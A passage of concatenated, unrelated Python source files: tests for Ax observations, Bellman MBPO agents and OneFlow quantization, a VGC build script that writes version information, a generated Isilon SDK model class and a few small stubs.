obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name", "start_time"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a", "b"]],
"means": [np.array([2.0, 4.0]), np.array([3.0, 5.0])],
"covariance": [np.diag([4.0, 16.0]), np.diag([9.0, 25.0])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testSeparateObservations(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
obs_feats, obs_data = separate_observations(observations=[obs])
self.assertEqual(obs_feats[0], ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs_data[0],
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
obs_feats, obs_data = separate_observations(observations=[obs], copy=True)
self.assertEqual(obs_feats[0], ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs_data[0],
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
def testObservationsWithCandidateMetadata(self):
SOME_METADATA_KEY = "metadatum"
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
},
{
"arm_name": "1_0",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 1,
"metric_name": "a",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment,
GeneratorRun(
arms=[arms[obs["arm_name"]]],
candidate_metadata_by_arm_signature={
arms[obs["arm_name"]].signature: {
SOME_METADATA_KEY: f"value_{obs['trial_index']}"
}
},
),
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
for observation in observations:
self.assertEqual(
observation.features.metadata.get(SOME_METADATA_KEY),
f"value_{observation.features.trial_index}",
)
|
#!/usr/bin/env python3
#
# Generates a file called version.txt with versioning info. Example:
#
# manufacturer=VGC Software
# suite=VGC
# versionType=alpha
# versionMajor=
# versionMinor=
# versionName=Alpha 2019-07-10
# commitRepository=https://github.com/vgc/vgc
# commitBranch=master
# commitHash=09793d56c9b4046e4507b5d13f06cd1772ce8cab
# commitDate=2019-07-10
# commitTime=12:16:35
# commitIndex=0
# buildCompiler=MSVC
# buildCompilerVersion=19.16.27031.1
# buildArchitecture=x64
# buildConfig=Release
# buildDate=2019-07-15
# buildTime=09:11:12
#
# We detail below some of the less obvious values.
#
# Suite
# -----
#
# We call a "suite" a group of related apps which are designed to be installed
# together and share resources, such as DLLs, images, fonts, etc.
#
# For example, "Adobe CC" and "Open Office" are suites. In our case, we are
# developing a suite named "VGC". You can change this name if you are forking
# the project.
#
# Version type
# ------------
#
# We call "version type" one of the following: "stable", "beta", and "alpha".
#
# Builds of VGC with different version types are considered to be different
# programs, and are installed side-by-side in different folders, e.g.:
#
# - C:/Program Files/VGC/
# - C:/Program Files/VGC Beta/
# - C:/Program Files/VGC Alpha/
#
# Note that other things determine whether different versions can be installed
# side-by-side, such as the "upgrade policy". See vgc/tools/windows/wix.py for
# more details.
#
# Version number (major and minor)
# --------------------------------
#
# Alpha versions don't have any version number associated with them. Both
# versionMajor and versionMinor are empty strings.
#
# Beta versions only have a major version number associated with them, e.g.,
# "2020". versionMinor is an empty string.
#
# Stable versions have both a major and minor version number, e.g., 2020.0.
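#
# For illustration (a hedged sketch; the values below are made up, and the
# exact formatting is implemented further below in this script):
#
#   versionType   versionMajor   versionMinor   versionName (before commit info)
#   -----------   ------------   ------------   --------------------------------
#   stable        "2020"         "1"            "2020.1"
#   beta          "2020"         ""             "2020 Beta"
#   alpha         ""             ""             "Alpha"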
#
# Commit branch
# -------------
#
# This is the Git branch this commit belongs to.
#
# But let's clarify this because it's not as obvious as it seems. In theory,
# in Git, a commit doesn't "belong to" any branch. A commit is just a node of
# a directed acyclic graph, and a branch is just a reference to one such node.
# In other words, a branch is not a set of commits; it is just a pointer to one
# commit. Most commits don't have any branch associated with them, as far as
# Git is concerned.
#
# However, in practice, and regardless of how Git works internally, most
# projects are following a branching model to organize development. In such
# models, the word "branch" usually does not mean a reference to a single
# commit, but rather means the "whole branch" more similarly to what a branch
# means for real living trees. This is what we mean by "commit branch", and it
# is quite well defined, even though git isn't aware of it. Here is our
# definition:
#
# For any given commit, we define its "commit branch" to be the name of the
# checked out branch when this commit was created.
#
# Indeed, when a commit is first created, there is one and only one branch
# that references this commit, which is the branch currently checked out. This
# is what we call the commit branch, and it never changes. Let's take the
# following sequence of commands as examples:
#
# - git checkout master:
# HEAD is a commit (let's call it c1) belonging to the master branch.
#
# --o--o c1 (master)
#
# - git checkout -b 2020:
# A new release branch is created, but for now it still references the same
# commit c1, belonging to master.
#
# --o--o c1 (master, 2020)
#
# - bump_version.sh && git commit:
#   Now, a new commit is created, let's call it c2. This new commit belongs to
# the branch "2020".
#
# o c2 (2020)
# /
# --o--o c1 (master)
#
# - git checkout master && git checkout -b gh62:
# We've created a new topic branch "gh62" off master, say, to fix a bug.
# The new topic branch still points to c1, belonging to master.
#
# o c2 (2020)
# /
# --o--o c1 (master, gh62)
#
# - fix_bug.sh && git commit:
#   A new commit is created, let's call it c3, fixing the bug. This new commit
# belongs to the branch "gh62".
#
# o c2 (2020)
# /
# --o--o c1 (master)
# \
# o c3 (gh62)
#
# - fix_bug_2.sh && git commit:
#   A new commit is created, let's call it c4, improving the bug fix based on
# feedback from code review. This new commit belongs to the branch "gh62".
#
# o c2 (2020)
# /
# --o--o c1 (master)
# \
# o--o c4 (gh62)
#
# - git checkout master && git merge --squash gh62:
# The bug-fix is squash-merged to master. This creates a new commit c5,
# containing all the changes introduced in gh62. c5 belongs to master.
#
# o c2 (2020)
# /
# --o--o--o c5 (master)
# \
# o--o c4 (gh62)
#
# (Alternatively, one could also use "git merge --no-ff gh62", which would
# also create a new commit c5 belonging to master)
#
# - git branch -D gh62:
# The branch gh62 is deleted. The commits c3 and c4 are now orphaned and
# can be considered deleted.
#
# o c2 (2020)
# /
# --o--o--o c5 (master)
# \
# ( o--o c4 ) <- orphaned
#
# - git checkout 2020 && git cherry-pick c5:
# The bug-fix is cherry-picked for inclusion in the 2020 release. This
# creates a new commit c6, containing all the changes introduced by c5
# (originally introduced by gh62). c6 belongs to 2020.
#
# o--o c6 (2020)
# /
# --o--o--o c5 (master)
# \
# ( o--o c4 ) <- orphaned
#
# In summary, any commit can be attributed a "commit branch":
#
# master: c1, c5
# 2020: c2, c6
# gh62: c3, c4 (now orphaned)
#
# Commit index
# ------------
#
# Count how many ancestors of this commit have the same commitDate as this
# commit. This makes it possible to uniquely identify a commit in a
# human-friendly way:
#
# commitBranch.commitDate.commitIndex (example: master.2019-07-10.0)
#
# However, note that topic branches are short-lived and eventually deleted, so
# for commits on a topic branch, this can only be a short-term identifier and
# does not entirely replace the commit hash.
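#
# Illustration (a hedged sketch; the dates below are made up): if the three
# most recent commits on master were all made on 2019-07-10, the oldest of
# them is identified as master.2019-07-10.0, the next one as
# master.2019-07-10.1, and the newest one as master.2019-07-10.2. In terms of
# the computation done further below in this script, this is roughly:
#
#   isodates = ["2019-07-10", "2019-07-10", "2019-07-10", "2019-07-09", ...]
#   commitIndex = str(isodates.count(isodates[0]) - 1)   # -> "2"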
#
from datetime import datetime, timezone
from pathlib import Path
import argparse
import subprocess
# Converts a date, given as a string in a given format, to a UTC datetime
# object.
#
# Example:
# dateformat = '%Y-%m-%d %H:%M:%S %z'
# datestring = '2019-06-23 18:00:45 -0800'
# d = utcdatetime(datestring, dateformat) # -> datetime(2019, 6, 24, 2, 0, 45, tzinfo=utc)
# print(d) # -> "2019-06-24 02:00:45+00:00"
#
def utcdatetime(datestring, dateformat):
return datetime.strptime(datestring, dateformat).astimezone(timezone.utc)
# Script entry point.
#
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("srcDir")
parser.add_argument("buildDir")
parser.add_argument("gitExecutable")
parser.add_argument("manufacturer")
parser.add_argument("suite")
parser.add_argument("versionType")
parser.add_argument("versionMajor")
parser.add_argument("versionMinor")
parser.add_argument("commitRepository")
parser.add_argument("commitBranch")
parser.add_argument("buildCompiler")
parser.add_argument("buildCompilerVersion")
parser.add_argument("buildArchitecture")
parser.add_argument("buildConfig")
args = parser.parse_args()
# Import arguments into the global namespace.
    # This allows us to simply write `foo` instead of `args.foo`.
globals().update(vars(args))
# The resulting string to write to version.txt
res = ""
# Basic version info
res += "manufacturer=" + manufacturer + "\n"
res += "suite=" + suite + "\n"
res += "versionType=" + versionType + "\n"
res += "versionMajor=" + versionMajor + "\n"
res += "versionMinor=" + versionMinor + "\n"
# Get commit info
commitHash = ""
commitDate = ""
commitTime = ""
commitIndex = ""
if gitExecutable:
# Branch
if not commitBranch:
p = subprocess.run(
[gitExecutable, "rev-parse", "--abbrev-ref", "HEAD"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
commitBranch = lines[0]
        # Hash
p = subprocess.run(
[gitExecutable, "rev-parse", "HEAD"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
commitHash = lines[0]
# Date, time, and index
p = subprocess.run(
[gitExecutable, "--no-pager", "log", "-100", "--pretty=format:%ci"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
dateformat = '%Y-%m-%d %H:%M:%S %z'
datetimes = [utcdatetime(s, dateformat) for s in lines]
isodates = [d.date().isoformat() for d in datetimes]
commitDate = isodates[0]
commitTime = datetimes[0].time().isoformat()
commitIndexInt = isodates.count(commitDate) - 1
commitIndex = str(commitIndexInt)
# Human-readable version name
    if versionType == "stable":
        versionName = versionMajor
        if int(versionMinor) > 0:
            versionName += "." + versionMinor
    elif versionType == "beta":
        versionName = versionMajor + " Beta"
    else:
        versionName = "Alpha"
hasCommitInfo = commitBranch and commitDate and commitIndex
if hasCommitInfo:
if ((versionType == "beta" and commitBranch != versionMajor) or
(versionType == "alpha" and commitBranch != "master")):
versionName += "-" + commitBranch
versionName += " " + commitDate + "." + commitIndex
res += "versionName=" + versionName + "\n"
# Note: installFamily, installVersion, and installHumanVersion are not in
# the version.txt file since they depend on the upgradePolicy, which we
# cannot know at this time. See vgc/tools/windows/wix.py for details.
# Write commit info
res += "commitRepository=" + commitRepository + "\n"
res += "commitBranch=" + commitBranch + "\n"
res += "commitHash=" + commitHash + "\n"
res += "commitDate=" + commitDate + "\n"
res += "commitTime=" + commitTime + "\n"
res += "commitIndex=" + commitIndex + "\n"
# Build info
now = datetime.now(timezone.utc)
res += "buildCompiler=" + buildCompiler + "\n"
res += "buildCompilerVersion=" + buildCompilerVersion + "\n"
res += "buildArchitecture=" + buildArchitecture + "\n"
res += "buildConfig=" + buildConfig + "\n"
res += "buildDate=" + now.date().isoformat() + "\n"
res += "buildTime=" + now.time().isoformat(timespec="seconds") + "\n"
# Write to file
versionDir = Path(buildDir) / buildConfig / "resources" / "core"
versionDir.mkdir(parents=True, exist_ok=True)
versionPath = versionDir / "version.txt"
versionPath.write_text(res)
# Print version info to console
print(f"\n{versionPath}:\n{res}", flush=True)
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_9_0_0.models.mapping_users_rules_parameters import MappingUsersRulesParameters # noqa: F401,E501
from isi_sdk_9_0_0.models.mapping_users_rules_rule_extended import MappingUsersRulesRuleExtended # noqa: F401,E501
class MappingUsersRulesExtended(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'parameters': 'MappingUsersRulesParameters',
'rules': 'list[MappingUsersRulesRuleExtended]'
}
attribute_map = {
'parameters': 'parameters',
'rules': 'rules'
}
def __init__(self, parameters=None, rules=None): # noqa: E501
"""MappingUsersRulesExtended - a model defined in Swagger""" # noqa: E501
self._parameters = None
self._rules = None
self.discriminator = None
if parameters is not None:
self.parameters = parameters
if rules is not None:
self.rules = rules
@property
def parameters(self):
"""Gets the parameters of this MappingUsersRulesExtended. # noqa: E501
Specifies the default UNIX user information that can be applied if the final credentials do not have valid UID and GID information. # noqa: E501
:return: The parameters of this MappingUsersRulesExtended. # noqa: E501
:rtype: MappingUsersRulesParameters
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this MappingUsersRulesExtended.
Specifies the default UNIX user information that can be applied if the final credentials do not have valid UID and GID information. # noqa: E501
:param parameters: The parameters of this MappingUsersRulesExtended. # noqa: E501
:type: MappingUsersRulesParameters
"""
self._parameters = parameters
@property
def rules(self):
"""Gets the rules of this MappingUsersRulesExtended. # noqa: E501
Specifies the list of user mapping rules. # noqa: E501
:return: The rules of this MappingUsersRulesExtended. # noqa: E501
:rtype: list[MappingUsersRulesRuleExtended]
"""
return self._rules
@rules.setter
def rules(self, rules):
"""Sets the rules of this MappingUsersRulesExtended.
Specifies the list of user mapping rules. # noqa: E501
:param rules: The rules of this MappingUsersRulesExtended. # noqa: E501
:type: list[MappingUsersRulesRuleExtended]
"""
self._rules = rules
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MappingUsersRulesExtended):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
# Copyright 2021 The Bellman Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import tensorflow as tf
from tf_agents.drivers.tf_driver import TFDriver
from tf_agents.environments import suite_gym
from tf_agents.environments.tf_py_environment import TFPyEnvironment
from tf_agents.policies.random_tf_policy import RandomTFPolicy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from bellman.agents.background_planning.model_free_agent_types import ModelFreeAgentType
from bellman.agents.components import EnvironmentModelComponents
from bellman.agents.mbpo.mbpo_agent import MbpoAgent
from bellman.environments.transition_model.keras_model.trajectory_sampler_types import (
TrajectorySamplerType,
)
from bellman.environments.transition_model.keras_model.transition_model_types import (
TransitionModelType,
)
from bellman.training.background_planning_agent_trainer import BackgroundPlanningAgentTrainer
from examples.utils.classic_control import MountainCarInitialState, MountainCarReward
@pytest.mark.parametrize("transition_model", [e for e in TransitionModelType])
@pytest.mark.parametrize("trajectory_sampler", [e for e in TrajectorySamplerType])
@pytest.mark.parametrize(
"model_free_agent_type",
[ModelFreeAgentType.Ddpg, ModelFreeAgentType.Sac, ModelFreeAgentType.Td3],
)
def test_all_mbpo_variants_work(transition_model, trajectory_sampler, model_free_agent_type):
"""
Mbpo Agent has prespecified transition model, trajectory sampler and model-free agent
types. Here we check that all combinations execute without errors.
"""
# setup the environment and a prespecified model components
py_env = suite_gym.load("MountainCarContinuous-v0")
tf_env = TFPyEnvironment(py_env)
time_step_spec = tf_env.time_step_spec()
observation_spec = tf_env.observation_spec()
action_spec = tf_env.action_spec()
reward_model = MountainCarReward(observation_spec, action_spec)
initial_state_distribution_model = MountainCarInitialState(observation_spec)
# some parameters need to be set correctly
ensemble_size = 2
num_elites = 10
population_size = num_elites + 10
horizon = 1
# define agent, many transition model and trajectory optimiser parameters can
# be arbitrary
agent = MbpoAgent(
time_step_spec,
action_spec,
transition_model,
1,
10,
tf.nn.relu,
ensemble_size,
False,
1,
1,
[tf.keras.callbacks.EarlyStopping(monitor="loss", patience=3)],
reward_model,
initial_state_distribution_model,
trajectory_sampler,
horizon,
population_size,
model_free_agent_type,
1,
10,
tf.nn.relu,
2,
1,
)
# we need some training data
random_policy = RandomTFPolicy(
time_step_spec,
action_spec,
info_spec=agent.collect_policy.info_spec,
)
model_training_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
random_policy.trajectory_spec, batch_size=1, max_length=1000
)
collect_driver_random_policy = TFDriver(
tf_env,
random_policy,
observers=[model_training_buffer.add_batch],
max_steps=10,
disable_tf_function=True,
)
initial_time_step = tf_env.reset()
collect_driver_random_policy.run(initial_time_step)
pets_agent_trainer = BackgroundPlanningAgentTrainer(10, 10)
tf_training_scheduler = pets_agent_trainer.create_training_scheduler(
agent, model_training_buffer
)
training_losses = tf_training_scheduler.maybe_train(tf.constant(10, dtype=tf.int64))
assert EnvironmentModelComponents.TRANSITION in training_losses
# test the agent
collect_driver_planning_policy = TFDriver(
tf_env,
agent.collect_policy,
observers=[model_training_buffer.add_batch],
max_steps=10,
disable_tf_function=True,
)
time_step = tf_env.reset()
collect_driver_planning_policy.run(time_step)
|
from django.conf import settings
from conference.models import Conference
def test_index(admin_client):
"""
Basic test to see if it even works.
"""
url = "/nothing-to-see-here/"
HTTP_OK_200 = 200
Conference.objects.create(
code=settings.CONFERENCE_CONFERENCE,
name=settings.CONFERENCE_CONFERENCE,
)
    response = admin_client.get(url)
    assert response.status_code == HTTP_OK_200
|
import sys
import envs
from models.dqn import DQN2013
from argument.argManage import args
from common.utlis import set_seed
from interactor.episodeTrainer import run_GuidenceEnv
sys.path.append('..')
def run():
env = envs.make(args.env_name)
train_agent = DQN2013(env.state_dim, env.action_dim, is_train=True, is_based=False, scope="guidence")
run_GuidenceEnv(env, train_agent)
if __name__ == '__main__':
args.Sum_Oil = 100
args.map_area = 10000
args.env_name = "guidence"
args.experiment_name = "guidence"
set_seed(args.seed)
run()
|
from .friend import *
from .group import *
from .file import *
from .device import *
from .others import *
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class beacon(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-beacon - based on the path /beacon. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
_pyangbind_elements = {}
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import math
import numpy as np
import unittest
import oneflow as flow
import oneflow.typing as oft
import test_global_storage
from test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type
def gen_quant_scale_for_min_max_symmetric(weight, quantization_bit):
weight_max = np.max(np.abs(weight))
denominator = 2.0 ** (quantization_bit - 1) - 1
return weight_max / denominator, 0
def gen_quant_scale_for_min_max_affine(weight, quantization_bit):
weight_max = np.max(weight)
weight_min = np.min(weight)
denominator = 2.0 ** (quantization_bit) - 1
scale = (weight_max - weight_min) / denominator
zero_point = -np.round(weight_min / scale)
return scale, zero_point
def gen_quant_scale_for_min_max_cambricon(weight, quantization_bit):
weight_max = np.max(np.abs(weight))
scale = math.floor(math.log2(weight_max)) - (quantization_bit - 2)
return scale, 0
def product(tu):
return np.prod(tu).astype(np.int).item()
def _check_min_max_observer(
test_case,
weight,
scale_of,
zero_point_of,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
if per_layer_quantization or quantization_formula == "cambricon":
outer_num = 1
inner_num = product(weight.shape[0:])
else:
outer_num = weight.shape[0]
inner_num = product(weight.shape[1:])
scale_np = np.zeros((outer_num,))
zero_point_np = np.zeros((outer_num,))
weight_flatten = weight.flatten()
if quantization_formula == "google":
if quantization_scheme == "symmetric":
for c in range(outer_num):
(
scale_np[c],
zero_point_np[c],
) = gen_quant_scale_for_min_max_symmetric(
weight_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
)
else: # "affine"
for c in range(outer_num):
scale_np[c], zero_point_np[c] = gen_quant_scale_for_min_max_affine(
weight_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
)
else: # quantization_formula == "cambricon"
scale_np[0], zero_point_np[0] = gen_quant_scale_for_min_max_cambricon(
weight_flatten, quantization_bit
)
test_case.assertTrue(np.allclose(scale_of, scale_np, rtol=1e-3))
test_case.assertTrue(
np.allclose(
zero_point_of.astype(np.int), zero_point_np.astype(np.int), rtol=1e-3
)
)
def _run_test_min_max_observer(
test_case,
device_type,
device_num,
dtype,
weight_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="predict", function_config=flow.FunctionConfig())
def QuantizeJob(
weight: oft.Numpy.Placeholder(weight_shape, dtype=type_name_to_flow_type[dtype])
):
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
scale, zero_point = flow.quantization.min_max_observer(
weight,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
return scale, zero_point
weight = (np.random.random(weight_shape) - 0.5).astype(type_name_to_np_type[dtype])
scale, zero_point = QuantizeJob(weight).get()
_check_min_max_observer(
test_case,
weight,
scale.numpy(),
zero_point.numpy(),
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
def gen_quant_scale_for_moving_average_min_max_symmetric(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(np.abs(activation))
denominator = 2.0 ** (quantization_bit - 1) - 1
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
moving_min[0] = moving_max[0]
return moving_max[0] / denominator, 0
def gen_quant_scale_for_moving_average_min_max_affine(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(activation)
activation_min = np.min(activation)
denominator = 2.0 ** (quantization_bit) - 1
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
if moving_min[0] == 0:
moving_min[0] = activation_min
else:
moving_min[0] = moving_min[0] * momentum + activation_min * (1 - momentum)
scale = (moving_max[0] - moving_min[0]) / denominator
zero_point = -np.round(moving_min[0] / scale)
return scale, zero_point
def gen_quant_scale_for_moving_average_min_max_cambricon(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(np.abs(activation))
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
moving_min[0] = moving_max[0]
return math.floor(math.log2(moving_max[0])) - (quantization_bit - 2), 0
def _check_moving_average_min_max_observer(
test_case,
activation,
scale_of,
zero_point_of,
moving_max_np,
moving_min_np,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
):
if quantization_formula == "google":
if quantization_scheme == "symmetric":
(
scale_np,
zero_point_np,
) = gen_quant_scale_for_moving_average_min_max_symmetric(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
else: # "affine"
scale_np, zero_point_np = gen_quant_scale_for_moving_average_min_max_affine(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
else: # quantization_formula == "cambricon":
scale_np, zero_point_np = gen_quant_scale_for_moving_average_min_max_cambricon(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
test_case.assertTrue(np.allclose(scale_of[0], scale_np, rtol=1e-3))
test_case.assertTrue(np.allclose(zero_point_of[0], zero_point_np, rtol=1e-3))
def _run_test_moving_average_min_max_observer(
test_case,
device_type,
device_num,
dtype,
activation_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="train", function_config=flow.FunctionConfig())
def QuantizeJob(
activation: oft.Numpy.Placeholder(
activation_shape, dtype=type_name_to_flow_type[dtype]
)
):
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
x = flow.get_variable(
"x",
shape=activation_shape,
dtype=activation.dtype,
initializer=flow.zeros_initializer(activation.dtype),
trainable=True,
)
scale, zero_point = flow.quantization.moving_average_min_max_observer(
activation,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
)
fake = x + activation
loss = flow.math.reduce_mean(fake)
flow.optimizer.Adam(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]),
).minimize(loss)
return scale, zero_point
moving_max_np = np.zeros((1,))
moving_min_np = np.zeros((1,))
for i in range(10):
activation = (np.random.random(activation_shape) - 0.5).astype(
type_name_to_np_type[dtype]
)
scale, zero_point = QuantizeJob(activation).get()
_check_moving_average_min_max_observer(
test_case,
activation,
scale.numpy(),
zero_point.numpy(),
moving_max_np,
moving_min_np,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
)
def fake_quant_per_layer_symmetric(input, quantization_bit, scale):
upper_bound = 2.0 ** (quantization_bit - 1) - 1
lower_bound = -upper_bound
return np.clip(np.rint(input / scale), lower_bound, upper_bound) * scale
def fake_quant_per_layer_affine(input, quantization_bit, scale, zero_point):
upper_bound = 2.0 ** (quantization_bit) - 1
lower_bound = 0
return (
np.clip(np.rint(input / scale + zero_point), lower_bound, upper_bound)
- zero_point
) * scale
def fake_quant_per_layer_cambricon(input, quantization_bit, shift):
upper_bound = 2.0 ** (quantization_bit - 1) - 1
lower_bound = -upper_bound
scale = 2 ** shift
return np.clip(np.rint(input / scale), lower_bound, upper_bound) * scale
def _check_fake_quantize(
test_case,
input,
input_diff_of,
out_of,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
if per_layer_quantization or quantization_formula == "cambricon":
outer_num = 1
inner_num = product(input.shape[0:])
else:
outer_num = input.shape[0]
inner_num = product(input.shape[1:])
scale_np = np.zeros((outer_num,))
zero_point_np = np.zeros((outer_num,))
out_np = np.zeros((inner_num * outer_num,))
input_flatten = input.flatten()
input_diff_np = np.full((inner_num * outer_num,), 1.0 / (inner_num * outer_num))
if quantization_formula == "google":
if quantization_scheme == "symmetric":
for c in range(outer_num):
(
scale_np[c],
zero_point_np[c],
) = gen_quant_scale_for_min_max_symmetric(
input_flatten[c * inner_num : (c + 1) * inner_num], quantization_bit
)
out = fake_quant_per_layer_symmetric(
input_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
scale_np[c],
)
out_np[c * inner_num : (c + 1) * inner_num] = out
else: # "affine"
for c in range(outer_num):
scale_np[c], zero_point_np[c] = gen_quant_scale_for_min_max_affine(
input_flatten[c * inner_num : (c + 1) * inner_num], quantization_bit
)
out = fake_quant_per_layer_affine(
input_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
scale_np[c],
zero_point_np[c],
)
out_np[c * inner_num : (c + 1) * inner_num] = out
else: # quantization_formula == "cambricon"
scale_np[0], zero_point_np[0] = gen_quant_scale_for_min_max_cambricon(
input_flatten, quantization_bit
)
out_np = fake_quant_per_layer_cambricon(
input_flatten, quantization_bit, scale_np[0]
)
